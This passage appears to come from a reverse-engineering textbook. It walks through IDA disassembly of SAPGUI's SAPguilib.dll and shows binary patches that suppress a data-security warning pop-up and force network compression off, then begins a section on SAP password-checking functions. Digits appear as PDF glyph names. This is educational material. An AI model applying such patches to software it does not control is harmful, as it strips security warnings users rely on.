fread (buf, flen, 1, f);
fclose (f);
crypt (buf, flen_aligned, pw);
f=fopen(fout, "wb");
fwrite ("QR9", 3, 1, f);
fwrite (&flen, 4, 1, f);
fwrite (buf, flen_aligned, 1, f);
fclose (f);
free (buf);
};
void decrypt_file(char *fin, char* fout, char *pw)
{
FILE *f;
int real_flen, flen;
BYTE *buf;
f=fopen(fin, "rb");
if (f==NULL)
{
printf ("Cannot open input file!\n");
return;
};
fseek (f, 0, SEEK_END);
flen=ftell (f);
fseek (f, 0, SEEK_SET);
buf=(BYTE*)malloc (flen);
fread (buf, flen, 1, f);
fclose (f);
if (memcmp (buf, "QR9", 3)!=0)
{
printf ("File is not crypted!\n");
return;
};
memcpy (&real_flen, buf+3, 4);
decrypt (buf+(3+4), flen-(3+4), pw);
f=fopen(fout, "wb");
fwrite (buf+(3+4), real_flen, 1, f);
fclose (f);
free (buf);
};
// run: input output 0/1 password
/two.pnum/two.pnum/zero.pnum
// 0 for encrypt, 1 for decrypt
int main(int argc, char *argv[])
{
if (argc!=5)
{
printf ("Incorrect parameters!\n");
return 1;
};
if (strcmp (argv[3], "0")==0)
crypt_file (argv[1], argv[2], argv[4]);
else
if (strcmp (argv[3], "1")==0)
decrypt_file (argv[1], argv[2], argv[4]);
else
printf ("Wrong param %s\n", argv[3]);
return 0;
};
/seven.pnum./two.pnum SAP
/seven.pnum./two.pnum./one.pnum About SAP client network traffic compression
(Tracing connection between TDW_NOCOMPRESS SAPGUI/three.pnumenvironment variable to nagging pop-up window and
actual data compression routine.)
It’s known that network traffic between SAPGUI and SAP is not crypted by default, it’s rather compressed (read
here and here).
It’s also known that by setting environment variable TDW_NOCOMPRESS to /one.pnum, it’s possible to turn network pack-
ets compression off.
But you will see a nagging pop-up windows that cannot be closed:
Figure /seven.pnum./one.pnum: Screenshot
Let’s see, if we can remove that window somehow.
/three.pnumSAP GUI client
/two.pnum/two.pnum/one.pnum
But before this, let’s see what we already know. First: we know that environment variable TDW_NOCOMPRESS is
checked somewhere inside of SAPGUI client. Second: string like “data compression switched off” must be present
somewhere too. With the help of FAR file manager I found that both of these strings are stored in the SAPguilib.dll
file.
So let’s open SAPguilib.dll in IDA /five.pnum and search for “TDW_NOCOMPRESS” string. Yes, it is present and there is
only one reference to it.
We see the following fragment of code (all file offsets are valid for SAPGUI /seven.pnum/two.pnum/zero.pnum win/three.pnum/two.pnum, SAPguilib.dll file version
/seven.pnum/two.pnum/zero.pnum/zero.pnum,/one.pnum,/zero.pnum,/nine.pnum/zero.pnum/zero.pnum/nine.pnum):
.text:6440D51B lea eax, [ebp+2108h+var_211C]
.text:6440D51E push eax ; int
.text:6440D51F push offset aTdw_nocompress ; "TDW_NOCOMPRESS"
.text:6440D524 mov byte ptr [edi+15h], 0
.text:6440D528 call chk_env
.text:6440D52D pop ecx
.text:6440D52E pop ecx
.text:6440D52F push offset byte_64443AF8
.text:6440D534 lea ecx, [ebp+2108h+var_211C]
; demangled name: int ATL::CStringT::Compare(char const *)const
.text:6440D537 call ds:mfc90_1603
.text:6440D53D test eax, eax
.text:6440D53F jz short loc_6440D55A
.text:6440D541 lea ecx, [ebp+2108h+var_211C]
; demangled name: const char* ATL::CSimpleStringT::operator PCXSTR
.text:6440D544 call ds:mfc90_910
.text:6440D54A push eax ; Str
.text:6440D54B call ds:atoi
.text:6440D551 test eax, eax
.text:6440D553 setnz al
.text:6440D556 pop ecx
.text:6440D557 mov [edi+15h], al
String returned by chk_env() via second argument is then handled by MFC string functions and then atoi()/four.pnum
is called. A/f_ter that, numerical value is stored to edi+15h .
Also, take a look onto chk_env() function (I gave a name to it):
.text:64413F20 ; int __cdecl chk_env(char *VarName, int)
.text:64413F20 chk_env proc near
.text:64413F20
.text:64413F20 DstSize = dword ptr -0Ch
.text:64413F20 var_8 = dword ptr -8
.text:64413F20 DstBuf = dword ptr -4
.text:64413F20 VarName = dword ptr 8
.text:64413F20 arg_4 = dword ptr 0Ch
.text:64413F20
.text:64413F20 push ebp
.text:64413F21 mov ebp, esp
.text:64413F23 sub esp, 0Ch
.text:64413F26 mov [ebp+DstSize], 0
.text:64413F2D mov [ebp+DstBuf], 0
.text:64413F34 push offset unk_6444C88C
.text:64413F39 mov ecx, [ebp+arg_4]
; (demangled name) ATL::CStringT::operator=(char const *)
.text:64413F3C call ds:mfc90_820
.text:64413F42 mov eax, [ebp+VarName]
.text:64413F45 push eax ; VarName
.text:64413F46 mov ecx, [ebp+DstSize]
.text:64413F49 push ecx ; DstSize
.text:64413F4A mov edx, [ebp+DstBuf]
.text:64413F4D push edx ; DstBuf
/four.pnumstandard C library function, coverting number in string into number
/two.pnum/two.pnum/two.pnum
.text:64413F4E lea eax, [ebp+DstSize]
.text:64413F51 push eax ; ReturnSize
.text:64413F52 call ds:getenv_s
.text:64413F58 add esp, 10h
.text:64413F5B mov [ebp+var_8], eax
.text:64413F5E cmp [ebp+var_8], 0
.text:64413F62 jz short loc_64413F68
.text:64413F64 xor eax, eax
.text:64413F66 jmp short loc_64413FBC
.text:64413F68 ; ---------------------------------------------------------------------------
.text:64413F68
.text:64413F68 loc_64413F68:
.text:64413F68 cmp [ebp+DstSize], 0
.text:64413F6C jnz short loc_64413F72
.text:64413F6E xor eax, eax
.text:64413F70 jmp short loc_64413FBC
.text:64413F72 ; ---------------------------------------------------------------------------
.text:64413F72
.text:64413F72 loc_64413F72:
.text:64413F72 mov ecx, [ebp+DstSize]
.text:64413F75 push ecx
.text:64413F76 mov ecx, [ebp+arg_4]
; demangled name: ATL::CSimpleStringT<char, 1>::Preallocate(int)
.text:64413F79 call ds:mfc90_2691
.text:64413F7F mov [ebp+DstBuf], eax
.text:64413F82 mov edx, [ebp+VarName]
.text:64413F85 push edx ; VarName
.text:64413F86 mov eax, [ebp+DstSize]
.text:64413F89 push eax ; DstSize
.text:64413F8A mov ecx, [ebp+DstBuf]
.text:64413F8D push ecx ; DstBuf
.text:64413F8E lea edx, [ebp+DstSize]
.text:64413F91 push edx ; ReturnSize
.text:64413F92 call ds:getenv_s
.text:64413F98 add esp, 10h
.text:64413F9B mov [ebp+var_8], eax
.text:64413F9E push 0FFFFFFFFh
.text:64413FA0 mov ecx, [ebp+arg_4]
; demangled name: ATL::CSimpleStringT::ReleaseBuffer(int)
.text:64413FA3 call ds:mfc90_5835
.text:64413FA9 cmp [ebp+var_8], 0
.text:64413FAD jz short loc_64413FB3
.text:64413FAF xor eax, eax
.text:64413FB1 jmp short loc_64413FBC
.text:64413FB3 ; ---------------------------------------------------------------------------
.text:64413FB3
.text:64413FB3 loc_64413FB3:
.text:64413FB3 mov ecx, [ebp+arg_4]
; demangled name: const char* ATL::CSimpleStringT::operator PCXSTR
.text:64413FB6 call ds:mfc90_910
.text:64413FBC
.text:64413FBC loc_64413FBC:
.text:64413FBC
.text:64413FBC mov esp, ebp
.text:64413FBE pop ebp
.text:64413FBF retn
.text:64413FBF chk_env endp
Yes.getenv_s()/five.pnumfunction is Microso/f_t security-enhanced version of getenv()/six.pnum.
There are also some MFC string manipulations.
/five.pnumhttp://msdn.microsoft.com/en-us/library/tb2sfw2z(VS.80).aspx
/six.pnumStandard C library returning environment variable
/two.pnum/two.pnum/three.pnum
Lots of other environment variables are checked as well. Here is a list of all variables being checked and what
SAPGUI could write to trace log when logging is turned on:
DPTRACE “GUI-OPTION: Trace set to %d”
TDW_HEXDUMP “GUI-OPTION: Hexdump enabled”
TDW_WORKDIR “GUI-OPTION: working directory ‘%s  ́’’
TDW_SPLASHSRCEENOFF “GUI-OPTION: Splash Screen Off” / “GUI-OPTION: Splash Screen On”
TDW_REPLYTIMEOUT “GUI-OPTION: reply timeout %d milliseconds”
TDW_PLAYBACKTIMEOUT “GUI-OPTION: PlaybackTimeout set to %d milliseconds”
TDW_NOCOMPRESS “GUI-OPTION: no compression read”
TDW_EXPERT “GUI-OPTION: expert mode”
TDW_PLAYBACKPROGRESS “GUI-OPTION: PlaybackProgress”
TDW_PLAYBACKNETTRAFFIC “GUI-OPTION: PlaybackNetTraffic”
TDW_PLAYLOG “GUI-OPTION: /PlayLog is YES, file %s”
TDW_PLAYTIME “GUI-OPTION: /PlayTime set to %d milliseconds”
TDW_LOGFILE “GUI-OPTION: TDW_LOGFILE ‘%s  ́’’
TDW_WAN “GUI-OPTION: WAN - low speed connection enabled”
TDW_FULLMENU “GUI-OPTION: FullMenu enabled”
SAP_CP / SAP_CODEPAGE “GUI-OPTION: SAP_CODEPAGE ‘%d  ́’’
UPDOWNLOAD_CP “GUI-OPTION: UPDOWNLOAD_CP ‘%d  ́’’
SNC_PARTNERNAME “GUI-OPTION: SNC name ‘%s  ́’’
SNC_QOP “GUI-OPTION: SNC_QOP ‘%s  ́’’
SNC_LIB “GUI-OPTION: SNC is set to: %s”
SAPGUI_INPLACE “GUI-OPTION: environment variable SAPGUI_INPLACE is on”
Settings for each variable are written to the array via pointer in EDIregister.EDIis being set before that function
call:
.text:6440EE00 lea edi, [ebp+2884h+var_2884] ; options here like +0x15...
.text:6440EE03 lea ecx, [esi+24h]
.text:6440EE06 call load_command_line
.text:6440EE0B mov edi, eax
.text:6440EE0D xor ebx, ebx
.text:6440EE0F cmp edi, ebx
.text:6440EE11 jz short loc_6440EE42
.text:6440EE13 push edi
.text:6440EE14 push offset aSapguiStoppedA ; "Sapgui stopped after commandline interp"...
.text:6440EE19 push dword_644F93E8
.text:6440EE1F call FEWTraceError
Now, can we find “data record mode switched on” string? Yes, and here is the only reference in function CDwsGui::PrepareInfoWindow() .
How do I know class/method names? There is a lot of special debugging calls writing to log-files like:
.text:64405160 push dword ptr [esi+2854h]
.text:64405166 push offset aCdwsguiPrepare ; "\nCDwsGui::PrepareInfoWindow: sapgui env
"...
.text:6440516B push dword ptr [esi+2848h]
.text:64405171 call dbg
.text:64405176 add esp, 0Ch
...or:
.text:6440237A push eax
.text:6440237B push offset aCclientStart_6 ; "CClient::Start: set shortcut user to
’\%"...
.text:64402380 push dword ptr [edi+4]
.text:64402383 call dbg
.text:64402388 add esp, 0Ch
It’svery useful.
So let’s see contents of that nagging pop-up window function:
/two.pnum/two.pnum/four.pnum
.text:64404F4F CDwsGui__PrepareInfoWindow proc near
.text:64404F4F
.text:64404F4F pvParam = byte ptr -3Ch
.text:64404F4F var_38 = dword ptr -38h
.text:64404F4F var_34 = dword ptr -34h
.text:64404F4F rc = tagRECT ptr -2Ch
.text:64404F4F cy = dword ptr -1Ch
.text:64404F4F h = dword ptr -18h
.text:64404F4F var_14 = dword ptr -14h
.text:64404F4F var_10 = dword ptr -10h
.text:64404F4F var_4 = dword ptr -4
.text:64404F4F
.text:64404F4F push 30h
.text:64404F51 mov eax, offset loc_64438E00
.text:64404F56 call __EH_prolog3
.text:64404F5B mov esi, ecx ; ECX is pointer to object
.text:64404F5D xor ebx, ebx
.text:64404F5F lea ecx, [ebp+var_14]
.text:64404F62 mov [ebp+var_10], ebx
; demangled name: ATL::CStringT(void)
.text:64404F65 call ds:mfc90_316
.text:64404F6B mov [ebp+var_4], ebx
.text:64404F6E lea edi, [esi+2854h]
.text:64404F74 push offset aEnvironmentInf ; "Environment information:\n"
.text:64404F79 mov ecx, edi
; demangled name: ATL::CStringT::operator=(char const *)
.text:64404F7B call ds:mfc90_820
.text:64404F81 cmp [esi+38h], ebx
.text:64404F84 mov ebx, ds:mfc90_2539
.text:64404F8A jbe short loc_64404FA9
.text:64404F8C push dword ptr [esi+34h]
.text:64404F8F lea eax, [ebp+var_14]
.text:64404F92 push offset aWorkingDirecto ; "working directory: ’\%s’\n"
.text:64404F97 push eax
; demangled name: ATL::CStringT::Format(char const *,...)
.text:64404F98 call ebx ; mfc90_2539
.text:64404F9A add esp, 0Ch
.text:64404F9D lea eax, [ebp+var_14]
.text:64404FA0 push eax
.text:64404FA1 mov ecx, edi
; demangled name: ATL::CStringT::operator+=(class ATL::CSimpleStringT<char, 1> const &)
.text:64404FA3 call ds:mfc90_941
.text:64404FA9
.text:64404FA9 loc_64404FA9:
.text:64404FA9 mov eax, [esi+38h]
.text:64404FAC test eax, eax
.text:64404FAE jbe short loc_64404FD3
.text:64404FB0 push eax
.text:64404FB1 lea eax, [ebp+var_14]
.text:64404FB4 push offset aTraceLevelDAct ; "trace level \%d activated\n"
.text:64404FB9 push eax
; demangled name: ATL::CStringT::Format(char const *,...)
.text:64404FBA call ebx ; mfc90_2539
.text:64404FBC add esp, 0Ch
.text:64404FBF lea eax, [ebp+var_14]
.text:64404FC2 push eax
.text:64404FC3 mov ecx, edi
; demangled name: ATL::CStringT::operator+=(class ATL::CSimpleStringT<char, 1> const &)
.text:64404FC5 call ds:mfc90_941
/two.pnum/two.pnum/five.pnum
.text:64404FCB xor ebx, ebx
.text:64404FCD inc ebx
.text:64404FCE mov [ebp+var_10], ebx
.text:64404FD1 jmp short loc_64404FD6
.text:64404FD3 ; ---------------------------------------------------------------------------
.text:64404FD3
.text:64404FD3 loc_64404FD3:
.text:64404FD3 xor ebx, ebx
.text:64404FD5 inc ebx
.text:64404FD6
.text:64404FD6 loc_64404FD6:
.text:64404FD6 cmp [esi+38h], ebx
.text:64404FD9 jbe short loc_64404FF1
.text:64404FDB cmp dword ptr [esi+2978h], 0
.text:64404FE2 jz short loc_64404FF1
.text:64404FE4 push offset aHexdumpInTrace ; "hexdump in trace activated\n"
.text:64404FE9 mov ecx, edi
; demangled name: ATL::CStringT::operator+=(char const *)
.text:64404FEB call ds:mfc90_945
.text:64404FF1
.text:64404FF1 loc_64404FF1:
.text:64404FF1
.text:64404FF1 cmp byte ptr [esi+78h], 0
.text:64404FF5 jz short loc_64405007
.text:64404FF7 push offset aLoggingActivat ; "logging activated\n"
.text:64404FFC mov ecx, edi
; demangled name: ATL::CStringT::operator+=(char const *)
.text:64404FFE call ds:mfc90_945
.text:64405004 mov [ebp+var_10], ebx
.text:64405007
.text:64405007 loc_64405007:
.text:64405007 cmp byte ptr [esi+3Dh], 0
.text:6440500B jz short bypass
.text:6440500D push offset aDataCompressio ; "data compression switched off\n"
.text:64405012 mov ecx, edi
; demangled name: ATL::CStringT::operator+=(char const *)
.text:64405014 call ds:mfc90_945
.text:6440501A mov [ebp+var_10], ebx
.text:6440501D
.text:6440501D bypass:
.text:6440501D mov eax, [esi+20h]
.text:64405020 test eax, eax
.text:64405022 jz short loc_6440503A
.text:64405024 cmp dword ptr [eax+28h], 0
.text:64405028 jz short loc_6440503A
.text:6440502A push offset aDataRecordMode ; "data record mode switched on\n"
.text:6440502F mov ecx, edi
; demangled name: ATL::CStringT::operator+=(char const *)
.text:64405031 call ds:mfc90_945
.text:64405037 mov [ebp+var_10], ebx
.text:6440503A
.text:6440503A loc_6440503A:
.text:6440503A
.text:6440503A mov ecx, edi
.text:6440503C cmp [ebp+var_10], ebx
.text:6440503F jnz loc_64405142
.text:64405045 push offset aForMaximumData ; "\nFor maximum data security delete\nthe s
"...
; demangled name: ATL::CStringT::operator+=(char const *)
.text:6440504A call ds:mfc90_945
.text:64405050 xor edi, edi
/two.pnum/two.pnum/six.pnum
.text:64405052 push edi ; fWinIni
.text:64405053 lea eax, [ebp+pvParam]
.text:64405056 push eax ; pvParam
.text:64405057 push edi ; uiParam
.text:64405058 push 30h ; uiAction
.text:6440505A call ds:SystemParametersInfoA
.text:64405060 mov eax, [ebp+var_34]
.text:64405063 cmp eax, 1600
.text:64405068 jle short loc_64405072
.text:6440506A cdq
.text:6440506B sub eax, edx
.text:6440506D sar eax, 1
.text:6440506F mov [ebp+var_34], eax
.text:64405072
.text:64405072 loc_64405072:
.text:64405072 push edi ; hWnd
.text:64405073 mov [ebp+cy], 0A0h
.text:6440507A call ds:GetDC
.text:64405080 mov [ebp+var_10], eax
.text:64405083 mov ebx, 12Ch
.text:64405088 cmp eax, edi
.text:6440508A jz loc_64405113
.text:64405090 push 11h ; i
.text:64405092 call ds:GetStockObject
.text:64405098 mov edi, ds:SelectObject
.text:6440509E push eax ; h
.text:6440509F push [ebp+var_10] ; hdc
.text:644050A2 call edi ; SelectObject
.text:644050A4 and [ebp+rc.left], 0
.text:644050A8 and [ebp+rc.top], 0
.text:644050AC mov [ebp+h], eax
.text:644050AF push 401h ; format
.text:644050B4 lea eax, [ebp+rc]
.text:644050B7 push eax ; lprc
.text:644050B8 lea ecx, [esi+2854h]
.text:644050BE mov [ebp+rc.right], ebx
.text:644050C1 mov [ebp+rc.bottom], 0B4h
; demangled name: ATL::CSimpleStringT::GetLength(void)
.text:644050C8 call ds:mfc90_3178
.text:644050CE push eax ; cchText
.text:644050CF lea ecx, [esi+2854h]
; demangled name: const char* ATL::CSimpleStringT::operator PCXSTR
.text:644050D5 call ds:mfc90_910
.text:644050DB push eax ; lpchText
.text:644050DC push [ebp+var_10] ; hdc
.text:644050DF call ds:DrawTextA
.text:644050E5 push 4 ; nIndex
.text:644050E7 call ds:GetSystemMetrics
.text:644050ED mov ecx, [ebp+rc.bottom]
.text:644050F0 sub ecx, [ebp+rc.top]
.text:644050F3 cmp [ebp+h], 0
.text:644050F7 lea eax, [eax+ecx+28h]
.text:644050FB mov [ebp+cy], eax
.text:644050FE jz short loc_64405108
.text:64405100 push [ebp+h] ; h
.text:64405103 push [ebp+var_10] ; hdc
.text:64405106 call edi ; SelectObject
.text:64405108
.text:64405108 loc_64405108:
.text:64405108 push [ebp+var_10] ; hDC
.text:6440510B push 0 ; hWnd
.text:6440510D call ds:ReleaseDC
.text:64405113
.text:64405113 loc_64405113:
/two.pnum/two.pnum/seven.pnum
.text:64405113 mov eax, [ebp+var_38]
.text:64405116 push 80h ; uFlags
.text:6440511B push [ebp+cy] ; cy
.text:6440511E inc eax
.text:6440511F push ebx ; cx
.text:64405120 push eax ; Y
.text:64405121 mov eax, [ebp+var_34]
.text:64405124 add eax, 0FFFFFED4h
.text:64405129 cdq
.text:6440512A sub eax, edx
.text:6440512C sar eax, 1
.text:6440512E push eax ; X
.text:6440512F push 0 ; hWndInsertAfter
.text:64405131 push dword ptr [esi+285Ch] ; hWnd
.text:64405137 call ds:SetWindowPos
.text:6440513D xor ebx, ebx
.text:6440513F inc ebx
.text:64405140 jmp short loc_6440514D
.text:64405142 ; ---------------------------------------------------------------------------
.text:64405142
.text:64405142 loc_64405142:
.text:64405142 push offset byte_64443AF8
; demangled name: ATL::CStringT::operator=(char const *)
.text:64405147 call ds:mfc90_820
.text:6440514D
.text:6440514D loc_6440514D:
.text:6440514D cmp dword_6450B970, ebx
.text:64405153 jl short loc_64405188
.text:64405155 call sub_6441C910
.text:6440515A mov dword_644F858C, ebx
.text:64405160 push dword ptr [esi+2854h]
.text:64405166 push offset aCdwsguiPrepare ; "\nCDwsGui::PrepareInfoWindow: sapgui env
"...
.text:6440516B push dword ptr [esi+2848h]
.text:64405171 call dbg
.text:64405176 add esp, 0Ch
.text:64405179 mov dword_644F858C, 2
.text:64405183 call sub_6441C920
.text:64405188
.text:64405188 loc_64405188:
.text:64405188 or [ebp+var_4], 0FFFFFFFFh
.text:6440518C lea ecx, [ebp+var_14]
; demangled name: ATL::CStringT::~CStringT()
.text:6440518F call ds:mfc90_601
.text:64405195 call __EH_epilog3
.text:6440519A retn
.text:6440519A CDwsGui__PrepareInfoWindow endp
ECXat function start gets pointer to object (because it is thiscall /two.pnum./five.pnum./four.pnum-type of function). In our case, that ob-
ject obviously has class type CDwsGui . Depends of option turned on in the object, specific message part will be
concatenated to resulting message.
If value at this+0x3D address is not zero, compression is off:
.text:64405007 loc_64405007:
.text:64405007 cmp byte ptr [esi+3Dh], 0
.text:6440500B jz short bypass
.text:6440500D push offset aDataCompressio ; "data compression switched off\n"
.text:64405012 mov ecx, edi
; demangled name: ATL::CStringT::operator+=(char const *)
.text:64405014 call ds:mfc90_945
.text:6440501A mov [ebp+var_10], ebx
.text:6440501D
.text:6440501D bypass:
/two.pnum/two.pnum/eight.pnum
It is interesting, that finally, var_/one.pnum/zero.pnum variable state defines whether the message is to be shown at all:
.text:6440503C cmp [ebp+var_10], ebx
.text:6440503F jnz exit ; bypass drawing
; add strings "For maximum data security delete" / "the setting(s) as soon as possible !":
.text:64405045 push offset aForMaximumData ; "\nFor maximum data security delete\nthe s
"...
.text:6440504A call ds:mfc90_945 ; ATL::CStringT::operator+=(char const *)
.text:64405050 xor edi, edi
.text:64405052 push edi ; fWinIni
.text:64405053 lea eax, [ebp+pvParam]
.text:64405056 push eax ; pvParam
.text:64405057 push edi ; uiParam
.text:64405058 push 30h ; uiAction
.text:6440505A call ds:SystemParametersInfoA
.text:64405060 mov eax, [ebp+var_34]
.text:64405063 cmp eax, 1600
.text:64405068 jle short loc_64405072
.text:6440506A cdq
.text:6440506B sub eax, edx
.text:6440506D sar eax, 1
.text:6440506F mov [ebp+var_34], eax
.text:64405072
.text:64405072 loc_64405072:
start drawing:
.text:64405072 push edi ; hWnd
.text:64405073 mov [ebp+cy], 0A0h
.text:6440507A call ds:GetDC
Let’s check our theory on practice.
JNZat this line ...
.text:6440503F jnz exit ; bypass drawing
...replace it with just JMP, and get SAPGUI working without that nagging pop-up window appearing!
Now let’s dig deeper and find connection between /zero.pnumx/one.pnum/five.pnum offset in load_command_line() (I gave that name to
that function) and this+0x3D variable in CDwsGui::PrepareInfoWindow . Are we sure that the value is the same?
I’m starting to search for all occurences of /zero.pnumx/one.pnum/five.pnum value in code. For some small programs like SAPGUI, it some-
times works. Here is the first occurence I got:
.text:64404C19 sub_64404C19 proc near
.text:64404C19
.text:64404C19 arg_0 = dword ptr 4
.text:64404C19
.text:64404C19 push ebx
.text:64404C1A push ebp
.text:64404C1B push esi
.text:64404C1C push edi
.text:64404C1D mov edi, [esp+10h+arg_0]
.text:64404C21 mov eax, [edi]
.text:64404C23 mov esi, ecx ; ESI/ECX are pointers to some unknown object.
.text:64404C25 mov [esi], eax
.text:64404C27 mov eax, [edi+4]
.text:64404C2A mov [esi+4], eax
.text:64404C2D mov eax, [edi+8]
.text:64404C30 mov [esi+8], eax
.text:64404C33 lea eax, [edi+0Ch]
.text:64404C36 push eax
.text:64404C37 lea ecx, [esi+0Ch]
; demangled name: ATL::CStringT::operator=(class ATL::CStringT ... &)
.text:64404C3A call ds:mfc90_817
/two.pnum/two.pnum/nine.pnum
.text:64404C40 mov eax, [edi+10h]
.text:64404C43 mov [esi+10h], eax
.text:64404C46 mov al, [edi+14h]
.text:64404C49 mov [esi+14h], al
.text:64404C4C mov al, [edi+15h] ; copy byte from 0x15 offset
.text:64404C4F mov [esi+15h], al ; to 0x15 offset in CDwsGui object
That function was called from the function named CDwsGui::CopyOptions ! And thanks again for debugging
information.
But the real answer in the function CDwsGui::Init() :
.text:6440B0BF loc_6440B0BF:
.text:6440B0BF mov eax, [ebp+arg_0]
.text:6440B0C2 push [ebp+arg_4]
.text:6440B0C5 mov [esi+2844h], eax
.text:6440B0CB lea eax, [esi+28h] ; ESI is pointer to CDwsGui object
.text:6440B0CE push eax
.text:6440B0CF call CDwsGui__CopyOptions
Finally, we understand: array filled in load_command_line() is actually placed in CDwsGui class but on this+0x28
address. /zero.pnumx/one.pnum/five.pnum + /zero.pnumx/two.pnum/eight.pnum is exactly /zero.pnumx/three.pnumD. OK, we found the place where the value is copied to.
Let’s also find other places where /zero.pnumx/three.pnumD offset is used. Here is one of them in CDwsGui::SapguiRun function
(again, thanks to debugging calls):
.text:64409D58 cmp [esi+3Dh], bl ; ESI is pointer to CDwsGui object
.text:64409D5B lea ecx, [esi+2B8h]
.text:64409D61 setz al
.text:64409D64 push eax ; arg_10 of CConnectionContext::CreateNetwork
.text:64409D65 push dword ptr [esi+64h]
; demangled name: const char* ATL::CSimpleStringT::operator PCXSTR
.text:64409D68 call ds:mfc90_910
.text:64409D68 ; no arguments
.text:64409D6E push eax
.text:64409D6F lea ecx, [esi+2BCh]
; demangled name: const char* ATL::CSimpleStringT::operator PCXSTR
.text:64409D75 call ds:mfc90_910
.text:64409D75 ; no arguments
.text:64409D7B push eax
.text:64409D7C push esi
.text:64409D7D lea ecx, [esi+8]
.text:64409D80 call CConnectionContext__CreateNetwork
Let’s check our findings. Replace setz al here toxor eax, eax / nop , clear TDW_NOCOMPRESS environ-
ment variable and run SAPGUI. Wow! There is no nagging window (just as expected, because variable is not set),
but in Wireshark we can see that the network packets are not compressed anymore! Obviously, this is the place
where compression flag is to be set in CConnectionContext object.
So, compression flag is passed in the /five.pnumth argument of function CConnectionContext::CreateNetwork . Inside
that function, another one is called:
...
.text:64403476 push [ebp+compression]
.text:64403479 push [ebp+arg_C]
.text:6440347C push [ebp+arg_8]
.text:6440347F push [ebp+arg_4]
.text:64403482 push [ebp+arg_0]
.text:64403485 call CNetwork__CNetwork
Compression flag is passing here in the /five.pnumth argument to CNetwork::CNetwork constructor.
And here is how CNetwork constructor sets some flag in CNetwork object according to the /five.pnumth argument and
some another variable which probably could affect network packets compression too.
.text:64411DF1 cmp [ebp+compression], esi
.text:64411DF7 jz short set_EAX_to_0
/two.pnum/three.pnum/zero.pnum
.text:64411DF9 mov al, [ebx+78h] ; another value may affect compression?
.text:64411DFC cmp al, ’3’
.text:64411DFE jz short set_EAX_to_1
.text:64411E00 cmp al, ’4’
.text:64411E02 jnz short set_EAX_to_0
.text:64411E04
.text:64411E04 set_EAX_to_1:
.text:64411E04 xor eax, eax
.text:64411E06 inc eax ; EAX -> 1
.text:64411E07 jmp short loc_64411E0B
.text:64411E09 ; ---------------------------------------------------------------------------
.text:64411E09
.text:64411E09 set_EAX_to_0:
.text:64411E09
.text:64411E09 xor eax, eax ; EAX -> 0
.text:64411E0B
.text:64411E0B loc_64411E0B:
.text:64411E0B mov [ebx+3A4h], eax ; EBX is pointer to CNetwork object
At this point we know that compression flag is stored in CNetwork class at this+/zero.pnumx/three.pnumA/four.pnum address.
Now let’s dig across SAPguilib.dll for /zero.pnumx/three.pnumA/four.pnum value. And here is the second occurence in CDwsGui::OnClientMessageWrite
(endless thanks for debugging information):
.text:64406F76 loc_64406F76:
.text:64406F76 mov ecx, [ebp+7728h+var_7794]
.text:64406F79 cmp dword ptr [ecx+3A4h], 1
.text:64406F80 jnz compression_flag_is_zero
.text:64406F86 mov byte ptr [ebx+7], 1
.text:64406F8A mov eax, [esi+18h]
.text:64406F8D mov ecx, eax
.text:64406F8F test eax, eax
.text:64406F91 ja short loc_64406FFF
.text:64406F93 mov ecx, [esi+14h]
.text:64406F96 mov eax, [esi+20h]
.text:64406F99
.text:64406F99 loc_64406F99:
.text:64406F99 push dword ptr [edi+2868h] ; int
.text:64406F9F lea edx, [ebp+7728h+var_77A4]
.text:64406FA2 push edx ; int
.text:64406FA3 push 30000 ; int
.text:64406FA8 lea edx, [ebp+7728h+Dst]
.text:64406FAB push edx ; Dst
.text:64406FAC push ecx ; int
.text:64406FAD push eax ; Src
.text:64406FAE push dword ptr [edi+28C0h] ; int
.text:64406FB4 call sub_644055C5 ; actual compression routine
.text:64406FB9 add esp, 1Ch
.text:64406FBC cmp eax, 0FFFFFFF6h
.text:64406FBF jz short loc_64407004
.text:64406FC1 cmp eax, 1
.text:64406FC4 jz loc_6440708C
.text:64406FCA cmp eax, 2
.text:64406FCD jz short loc_64407004
.text:64406FCF push eax
.text:64406FD0 push offset aCompressionErr ; "compression error [rc = \%d]- program wi
"...
.text:64406FD5 push offset aGui_err_compre ; "GUI_ERR_COMPRESS"
.text:64406FDA push dword ptr [edi+28D0h]
.text:64406FE0 call SapPcTxtRead
Let’s take a look into sub_/six.pnum/four.pnum/four.pnum/zero.pnum/five.pnum/five.pnumC/five.pnum . In it we can only see call to memcpy() and some other function named (by
IDA /five.pnum) sub_/six.pnum/four.pnum/four.pnum/one.pnum/seven.pnum/four.pnum/four.pnum/zero.pnum .
And, let’s take a look inside sub_/six.pnum/four.pnum/four.pnum/one.pnum/seven.pnum/four.pnum/four.pnum/zero.pnum . What we see is:
.text:6441747C push offset aErrorCsrcompre ; "\nERROR: CsRCompress: invalid handle"
.text:64417481 call eax ; dword_644F94C8
/two.pnum/three.pnum/one.pnum
.text:64417483 add esp, 4
Voilà! We’ve found the function which actually compresses data. As I revealed in past, this function is used in
SAP and also open-source MaxDB project. So it is available in sources.
Doing last check here:
.text:64406F79 cmp dword ptr [ecx+3A4h], 1
.text:64406F80 jnz compression_flag_is_zero
ReplaceJNZhere for unconditional JMP. Remove environment variable TDW_NOCOMPRESS. Voilà! In Wire-
shark we see that client messages are not compressed. Server responses, however, are compressed.
So we found exact connection between environment variable and the point where data compression routine
may be called or may be bypassed.
/seven.pnum./two.pnum./two.pnum SAP /six.pnum./zero.pnum password checking functions
While returning again to my SAP /six.pnum./zero.pnum IDES installed in VMware box, I figured out I forgot the password for SAP*
account, then it back to my memory, but now I got error message «Password logon no longer possible - too many
failed attempts» , because I’ve spent all these attempts in trying to recall it.
First extremely good news is that full disp+work.pdb file is supplied with SAP, it contain almost everything:
function names, structures, types, local variable and argument names, etc. What a lavish gi/f_t!
I got TYPEINFODUMP/seven.pnumutility for converting PDB files into something readable and grepable.
Here is an example of function information + its arguments + its local variables:
FUNCTION ThVmcSysEvent
Address: 10143190 Size: 675 bytes Index: 60483 TypeIndex: 60484
Type: int NEAR_C ThVmcSysEvent (unsigned int, unsigned char, unsigned short*)
Flags: 0
PARAMETER events
Address: Reg335+288 Size: 4 bytes Index: 60488 TypeIndex: 60489
Type: unsigned int
Flags: d0
PARAMETER opcode
Address: Reg335+296 Size: 1 bytes Index: 60490 TypeIndex: 60491
Type: unsigned char
Flags: d0
PARAMETER serverName
Address: Reg335+304 Size: 8 bytes Index: 60492 TypeIndex: 60493
Type: unsigned short*
Flags: d0
STATIC_LOCAL_VAR func
Address: 12274af0 Size: 8 bytes Index: 60495 TypeIndex: 60496
Type: wchar_t*
Flags: 80
LOCAL_VAR admhead
